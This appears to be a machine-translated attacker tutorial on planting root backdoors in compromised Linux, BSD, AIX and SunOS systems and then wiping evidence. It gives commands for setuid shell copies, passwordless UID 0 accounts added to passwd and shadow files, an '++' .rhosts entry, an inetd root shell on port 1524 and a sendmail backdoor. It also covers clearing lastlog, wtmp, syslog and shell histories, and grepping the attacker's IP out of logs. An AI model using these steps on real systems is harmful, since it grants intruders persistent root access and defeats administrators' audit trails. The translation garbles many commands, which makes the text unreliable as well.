Linux system backdoor + Log clearing

1. setuid
# Cp/bin/sh/tmp/. sh
# Chmod u + s/tmp/. sh
Adding suid to shell is simple but easy to find

2. echo "hack: 0: 0: // bin/csh">/etc/passwd
That is, add an account with the id 0 (root) to the system without a password.
But the Administrator will soon find out!

3. echo "++">/. rhosts
If the system runs port 512,513, you can
Add a file named hack to The. rhosts file. log on to rlogin without a password!

4. Add a "wiz" command to modify the sendmail. cf file;
Then telnet www.xxx.com 25 and then wiz .... OK

5. Change existing User Password

If there are many users on the host, you can change the password of a user who has not logged in for a long time.

# Passwd can be used with the passwd command.

6. rootkit backdoor package

There are a lot of places to download on the internet, look for it, try it, I'm also testing! No !!!!

 

-Bsd BACKDOOR:

Echo love: 92: 206: 0: 0: //:/bin/sh>/etc/master. passwd
/Usr/sbin/pwd_mkdb/etc/master. passwd

Here, I add a user with love whose ID is 92; the ROOT user is 0!
Now, we have added a user! What should I do if I have insufficient permissions?
Cp/bin/sh/tmp/. x (this x is randomly selected, like. sh,. a,. B, etc)
Chmod 777/tmp/. x
Chmod + s/tmp/. x
Use this to create a backdoor for him.
Later, we will be able to use tmp/. x to escalate permissions after logging on to this zombie.

-AIX backdoor (Kelvinzhou taught me, Thank you)

Echo "ingreslock stream tcp nowait root/bin/sh">/tmp/. x
/Usr/sbin/inetd-s/tmp/. x
Rm/tmp/. x
In this way, you can telnet ip 1524 to get the rootshell directly.

-SunOs Backdoor

Echo "love: 0: 0:/bin/bash">/etc/passwd
Echo "love: ::::::::" >>>/etc/shadow

When you use telnet, you are the root user! But no insurance!

-Linux Backdoor

Echo "love: 0: 0:/bin/bash">/etc/passwd
Echo "love: ::::::::" >>>/etc/shadow

If you have time, leave a few more backdoors!

 

If you leave a backdoor, You have to wipe your PP!

Unix system log files are usually stored in the "/var/log and/var/adm" directory. Generally, you can view syslog. conf to check the log configuration, for example, cat/etc/syslog. conf.
Generally, the logs we want to clear include

Lastlog

Utmp

Wtmp

Messages

Syslog

Sulog

In addition, various shells also record the history of commands used by users. It uses files in the user's main directory to record the history of these commands. Generally, the file name is. sh_history (ksh ),. history (csh), or. bash_history (bash.

If you have a program that clears logs like wipe. c, you can make it. Otherwise, you have to manually execute it! We recommend that you do not use rm to drop logs. It is best to adapt the logs,

For example:

# Cat>/usr/log/lastlog

-> Here is what you want to write, or do not enter it!

^ D-> here ^ d is to press ctrl + d! End!

#

The rest:

1. delete my telnet records.

2. Delete http logs.

To clear logs, I used cat xxx | grep-V "IP"> temp to overwrite the modified log files.